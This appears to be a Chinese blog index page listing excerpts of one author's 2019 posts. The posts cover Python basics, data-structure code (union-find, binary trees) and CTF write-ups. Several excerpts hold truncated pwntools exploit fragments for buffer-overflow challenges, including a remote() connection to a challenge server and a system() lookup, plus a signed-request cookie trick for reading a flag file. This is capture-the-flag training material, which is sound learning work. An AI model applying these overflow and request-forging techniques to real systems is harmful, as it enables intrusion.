摘要: ''' @Modify Time @Author python基本语法 2019/10/26 8:16 laoalo ''' import functools from filecmp import cmp print('#'*50,"字符串") dss = " hello pyqt.5 " s1 阅读全文
posted @ 2019-10-30 22:54 东坡肉肉君 阅读(1025) 评论(0) 推荐(0) 编辑
摘要: # ! /usr/bin/env python # -*- coding:utf-8 -*- from pwn import * context.log_level = 'debug' elf = ELF('leve2') sys_addr = elf.symbols['system'] sh_ad 阅读全文
posted @ 2019-10-30 21:24 东坡肉肉君 阅读(1760) 评论(1) 推荐(1) 编辑
摘要: 先反编译 : int __cdecl main(int argc, const char **argv, const char **envp) { write(1, "Hello, World\n", 0xDuLL); return vulnerable_function(); } 追踪一下 "vu 阅读全文
posted @ 2019-10-30 16:46 东坡肉肉君 阅读(1288) 评论(0) 推荐(0) 编辑
摘要: 解法一字符串拼接: 1.得到签名sign http://8fa4531c-1164-49b7-a700-70e77e6aacb7.node3.buuoj.cn/geneSign?param=flag.txtread 2.添加Cookie发送请求得到flag Cookie: action=readsc 阅读全文
posted @ 2019-10-30 15:10 东坡肉肉君 阅读(1418) 评论(0) 推荐(0) 编辑
摘要: 看样子是要让我们通过read(0, &unk_601068, 0x10uLL),读入 unk_601068 将 dword_60106C 覆盖 6c-68=4,所以: from pwn import * io = remote("111.198.29.45",45604) payload = "A" 阅读全文
posted @ 2019-10-30 13:47 东坡肉肉君 阅读(786) 评论(0) 推荐(0) 编辑
摘要: 所以题目要求是输入生日1926 payload: from pwn import * io = remote("111.198.29.45",40803) io.recvline() io.sendline('1234') io.recvline() payload = "A"*8 payload 阅读全文
posted @ 2019-10-30 13:30 东坡肉肉君 阅读(535) 评论(0) 推荐(0) 编辑
摘要: 所以题目要求是输入生日1926l 阅读全文
posted @ 2019-10-30 13:27 东坡肉肉君 阅读(172) 评论(0) 推荐(0) 编辑
摘要: 没有环的过程分析: #include<stdio.h> #include<stdlib.h> #include<iostream> #define VERTICES 6 #define LINE 5 using namespace std; /* parent:数组解决并查集合并问题 VERTICE 阅读全文
posted @ 2019-10-30 11:42 东坡肉肉君 阅读(719) 评论(0) 推荐(0) 编辑
摘要: PS:所有的代码示例使用的都是这个图 2019-10-29 利用p126的算法5.3建立二叉树,并完成三种遍历算法 中序 后序 先序 #include<iostream> #include<stack> #define TElemType char using namespace std; type 阅读全文
posted @ 2019-10-30 00:49 东坡肉肉君 阅读(819) 评论(0) 推荐(0) 编辑
摘要: //二叉树的顺序存储表示 #define MAXTSIZE 100 typedef TElemtype SqBiTree[MAXTSIZE]; SqBiTree bt; //二叉树的二叉链表存储表示 typedef struct BiTNode { TElemType data; struct Bi 阅读全文
posted @ 2019-10-30 00:24 东坡肉肉君 阅读(415) 评论(0) 推荐(0) 编辑